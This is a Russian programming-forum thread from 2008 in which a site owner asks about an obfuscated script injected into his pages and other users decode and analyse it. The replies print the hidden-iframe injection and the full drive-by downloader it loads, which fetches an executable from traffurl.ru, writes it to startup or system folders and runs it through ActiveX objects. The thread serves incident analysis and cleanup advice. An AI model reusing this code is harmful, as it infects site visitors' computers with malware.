Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Web программирование > JavaScript, Ajax
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 29.03.2008, 14:08   #1
Lx62GjVWZQJFjPD
Пользователь
 
Регистрация: 26.03.2008
Сообщений: 14
Вопрос Странный скрипт на страницах моих сайтов!

У меня хостинг, где размещены много сайтов, недавно на страницах "index.*" заметил странный скрипт, такого никогда лично не внедрял, даже некоторые страницы становится неработоспособными, если появляется дополнительный код, подскажите, пожалуйста, суть существования этого скрипта, что бы смог предпринимать подходящие меры безопасности, понятное дело что внешняя программное обеспечение записывала этот код, а может и нет?

Код между скобками: "<!-- o --><!-- c --><script>eval(unescape("%77%69%6e%6 4%6f%77%2e%73%74%61%74%75%73%3d%27% 44%6f%6e%65%27%3b%64%6f%63%75%6d%65 %6e%74%2e%77%72%69%74%65%28%27%3c%6 9%66%72%61%6d%65%20%6e%61%6d%65%3d% 65%35%37%32%62%63%30%20%73%72%63%3d %5c%27%68%74%74%70%3a%2f%2f%74%72%6 1%66%66%75%72%6c%2e%72%75%2f%73%6c% 69%76%3f%27%2b%4d%61%74%68%2e%72%6f %75%6e%64%28%4d%61%74%68%2e%72%61%6 e%64%6f%6d%28%29%2a%31%39%38%36%34% 38%29%2b%27%39%34%5c%27%20%77%69%64 %74%68%3d%35%33%34%20%68%65%69%67%6 8%74%3d%33%37%32%20%73%74%79%6c%65% 3d%5c%27%64%69%73%70%6c%61%79%3a%20 %6e%6f%6e%65%5c%27%3e%3c%2f%69%66%7 2%61%6d%65%3e%27%29")); </script>"
Lx62GjVWZQJFjPD вне форума Ответить с цитированием
Старый 29.03.2008, 15:18   #2
Johnatan
Antimoderаtoris
Участник клуба
 
Регистрация: 08.02.2008
Сообщений: 1,251
По умолчанию

Код HTML:
window.status='Done';document.write('<iframe name=e572bc0 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*198648)+'94\' width=534 height=372 style=\'display: none\'></iframe>')
вот что там зашифровано. Думай сам, что это и откуда.
98% из тысячи моих постов сделаны в профильном подфоруме. Я не накручиваю свои посты болтанием в "курилке", а ты?
Johnatan вне форума Ответить с цитированием
Старый 29.03.2008, 16:26   #3
mihali4
*
Старожил
 
Регистрация: 22.11.2006
Сообщений: 9,201
По умолчанию

http://1stat.ru/?domain=traffurl.ru
А вот что еще говорят наши импортные коллеги
(http://www.developersdex.com/asp/mes...78&r=6157380):
Цитата:
Its a trojan disguised as a codec and drops quietly and happily into your system through Media Player (unless you are one of the few
cautious types who set it to choose "Don't download codecs without bloody asking me first!"). For the OP this means a couple of things.

1. Your PC is now infected and has been recruited into a botnet.
2. Your website is infecting other PCs every time one visits it.
3. Your PC is now being used by a - probably criminal - gang.
4. The hard one - you know about it, so you are responsible.

In essence, this means fix the website, or you could be sued. Clean your PC, or you could be sued. Report the hacking to your hosting provider, or you could be sued. Report it to your local or national police, or - worst of all - you could be charged as an accessory to the criminal activity probably now going on with your PC and with all your website visitors. Yes, this is serious. You need to deal with it.
Да и в "Hard & Soft" было:
Цитата:
Исполнительный файл вируса: _http://traffurl.ru/sliv/load.exe (НЕ СКАЧИВАЙТЕ, ЕСЛИ НЕ УВЕРЕНЫ В НАДЕЖНОСТИ СВОЕЙ АНТИВИРУСНОЙ ЗАЩИТЫ!)

Последний раз редактировалось mihali4; 29.03.2008 в 16:30.
mihali4 вне форума Ответить с цитированием
Старый 29.03.2008, 17:05   #4
SkyM@n
Laravel/Vue expert
Старожил Подтвердите свой е-майл
 
Аватар для SkyM@n
 
Регистрация: 08.08.2007
Сообщений: 2,832
По умолчанию

Это последствие работы троянчика, который ворует пароли к ФТП. Потом меняет все РНР страницы, размещенные в корневике сайта.
Не храните ваши пароли на локальном компе, особенно в Тотал Коммандере!

Чтобы избавиться от дряни, уберите с каждого РНР-файла корневика сайта обфускаченный код, приведенный выше. А также, обязательно поменяйте пароль на ФТП.
SkyM@n вне форума Ответить с цитированием
Старый 29.03.2008, 17:09   #5
SkyM@n
Laravel/Vue expert
Старожил Подтвердите свой е-майл
 
Аватар для SkyM@n
 
Регистрация: 08.08.2007
Сообщений: 2,832
По умолчанию

Да, кстати, скрипт создает ифрейм, в котором запрограммирована вредоносная программа с использованием WSH и аджакса . Следовательно, код корректно будет работать только на Интернет Експлорере. Опять нам живой пример того, что тупой осел - еще тупее. Хотя сам аджакс написан и для "правильных" броузеров. На линуксе и других "правильных" системах - вирус работать не будет. А также, если юзер - не имеет прав админа.
Содержание ифрейма (для любопытных и иже с ними):
Код:
<SCRIPT Language="javascript" type="text/javascript"> 
function lsrn(lal){
var exes="\\hdip.exe";
var url="http://traffurl.ru/sliv/load.php";
var zoi="X"+"ML";
var req="G"+"ET";
var smm="D";
var ldobj=null;

try{
   ldobj=objmker(lal,"Mi"+"cro"+"sof"+"t."+zoi+"HTTP");
   ldobj.open(req,url,false);
}catch(e){
   try{
      ldobj=objmker(lal,"MS"+zoi+"2."+zoi+"HTTP");
      ldobj.open(req,url,false);
   }catch(e){
      try{
         ldobj=objmker(lal,"MS"+zoi+"2.Server"+zoi+"HTTP");
         ldobj.open(req,url,false);
     }
     catch(e){
        try{
          ldobj=new XMLHttpRequest();
          ldobj.open(req,url,false);
       }
       catch(e){
          return 0;
       }
    }
  }
}

try{
   ldobj.send(null);
}catch(e){
   try{
     ldobj.send(null);
   }
   catch(e){
      return 0;
   };
};

ldbody = ldobj.responseBody;
var obj_strm=objmker(lal,"A"+smm+"O"+smm+"B.S"+"tr"+"eam");
if(obj_strm){
   obj_strm.Type=1;
   obj_strm.Mode=3;
   obj_strm.Open();
   obj_strm.Write(ldbody);
   var hdrive="";
   var dtemp="";
   var dstart="";
   var daustart="";
   try{
      var obj_wscript=objmker(lal,"wscript.Shell");
      try{
         var  shProcEnv=obj_wscript.Environment("PROCESS");
         hdrive=wshProcEnv("HOMEDRIVE");
         dtemp=wshProcEnv("TEMP");
      }catch(e){};
      try{
        dstart=obj_wscript.Specialfolders("AllUsers");
        daustart=obj_wscript.Specialfolders("AllUsers");
     }catch(e){};
   }catch(e){};
   if(hdrive==""){
      hdrive="C:";
   };
   if(dtemp==""){
      try{
        var obj_fso=objmker(lal,"Sc"+"ript"+"ing.Fil"+"eSyst"+"emO"+"bject");
        dtemp=obj_fso.Getspecialfolder(2);
      }catch(e){};
   };
   var fnex="";
   var n="";
   if(fnex==""){
      if(daustart!=""){
          try{
             fn=daustart+exes;
             obj_strm.savetofile(fn,2);
             fnex=fn;
         }catch(e){};
      };
    };
----cut here---

Последний раз редактировалось SkyM@n; 29.03.2008 в 17:37. Причина: Сделал удобочитаемым
SkyM@n вне форума Ответить с цитированием
Старый 29.03.2008, 17:22   #6
SkyM@n
Laravel/Vue expert
Старожил Подтвердите свой е-майл
 
Аватар для SkyM@n
 
Регистрация: 08.08.2007
Сообщений: 2,832
По умолчанию

--cut here--
Код:
   if(fnex==""){
     if(dstart!=""){
        try { 
         fn=dstart+exes;
         obj_strm.savetofile(fn,2);
         fnex=fn;
       }catch(e){};
     };
   }; 
   if(fnex==""){
      try{
        fn=hdrive+"\\Documents and Settings\\All Users\\"+exes;
        obj_strm.savetofile(fn,2);
        fnex=fn;
     }catch(e){};
   }; 
   if(fnex==""){
      try{
        fn=hdrive+"\\Dokumente und Einstellungen\\All Users\\"+exes;
        obj_strm.savetofile(fn,2);
        fnex=fn;
     }catch(e){};
   }; 
   if(fnex==""){
     try{
       fn=dtemp+exes;
       obj_strm.savetofile(fn,2);
       fnex=fn;
    }catch(e){};
  }; 
   if(fnex==""){
     try{
       fn="C:"+exes;
       obj_strm.savetofile(fn,2);
       fnex=fn;
    }catch(e){};
   }; 
   if(fnex==""){
     try{
       fn="C:\\RECYCLER"+exes;
       obj_strm.savetofile(fn,2);
       fnex=fn;
     }catch(e){};
   }; 
   if(fnex==""){
      try{
        fn="C:\\RECYCLED"+exes;
        obj_strm.savetofile(fn,2);
        fnex=fn;
      }catch(e){};
   }; 
   if(fnex!=""){
      try{
        var obj_shl=objmker(lal, "She"+"ll.app"+"lication");
        obj_shl.Shellexecute(fnex);
      }catch(e){
          try{
            obj_wscript.Exec(fnex);
         }catch(e){
            try{
              var obj2mk = "testobj" + ".innerHTML" + "=testobj" + ".innerHTML" + "+\"<object";
              obj2mk = obj2mk + " classid" + "='clsid:" + "527196a4-b1a3-4647-931d-37ba5af23037";
              obj2mk = obj2mk + "' codebase=" + "'\"+fnex+\"'></" + "object>\";";
              eval(obj2mk);
           }catch(e){
              return 0;
           };
         };
       };
       return 1;
    }else{
      return 0;
    };
  };
};
var i=0;
var hncx=new Array("{BD96C"+"556-65A"+"3-11D0-9"+"83A-00C04"+"FC2"+"9E36}",
                                 "{"+"AB9BC"+"EDD-E"+"C7E-47"+"E1-9322"+"-D4A2"+"1061"+"7116}",
                                 "{0"+"006F033-0000-000"+"0-C0"+"00-0000000"+"000"+"46}",
                                 "{0006"+"F03A-0000-"+"0000-C000-"+"0000"+"000000"+"46}",
                                 "{6e32070"+"a-76"+"6d-4ee6-879c-d"+"c1fa91d2f"+"c3}", 
                                 "{6414512B-B"+"978-451D-A0D8-F"+"CF"+"DF33E83"+"3C}", 
                                 "{7F5B7"+"F63-F06F"+"-4331-8A26-339E03"+"C0AE"+"3D}", 
                                 "{06723E09-F4C2-43"+"c8-8358-09FC"+"D1DB0766}", 
                                 "{639"+"F725F-1B2D-48"+"31-"+"A9FD-8"+"7484768"+"2010}", 
                                 "{B"+"A018599-1DB3-44f9-83B"+"4-461454C8"+"4BF8}", 
                                 "{D0C07D5"+"6-7C69-"+"43F1-B4A0-2"+"5F5A11FAB1"+"9}", 
                                 "{E8"+"CCCDDF-CA28-496b-"+"B050-6C07C"+"96247"+"6B}",
                                 null);
good = 0; 
while(hncx[i]){
     var iuump = null;
     if(hncx[i].substring(0,1) == "{" ){
        iuump=document.createElement("object");
        iuump.setAttribute("id", "obj_RDS" + i);
        iuump.setAttribute("classid", "clsid:" + hncx[i].substring(1, hncx[i].length - 1));
     }
     if(iuump){
        try{
            if(lsrn(iuump)){break;};
        }catch(e){}
     }
     i++;
} 

function objmker(tt, lol){
   var nobj=null;
   try{
      eval('nobj=tt.CreateObject(lol)');
   }catch(e){} 
   if(!nobj){
   try{
      eval('nobj=tt.CreateObject(lol,"")');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.CreateObject(lol,"","")');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.GetObject("",lol)');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.GetObject(lol,"")');
   }catch(e){}
}

if(!nobj){
   try{
      eval('nobj=tt.GetObject(lol)');
   }catch(e){}
}
return(nobj);
}
</SCRIPT>
</body>
</html> 
<iframe src=http://traffurl.ru/slivv/index.php width=1 height=1 style="display:none"></iframe>
Этот кода создает еще один вложенный ифрейм, в котором копия этого же джаваскриптового кода.
Как видите, написано умно. Везде есть проверка на баги. Чтобы не вызвать левых сообщений, ошибок и прочих неудобств пользователю...ради того, чтобы причинить еще больший вред

Последний раз редактировалось SkyM@n; 29.03.2008 в 17:36.
SkyM@n вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
мой сайт взломали и в коды скриптов добавили вот этот скрипт. Что за скрипт? nsbox JavaScript, Ajax 9 21.01.2010 18:19
Помогите с формулой! Сил уже нет моих ((( runny Microsoft Office Excel 17 15.09.2008 16:20
Странный тип Yuran Общие вопросы Delphi 4 10.06.2008 10:11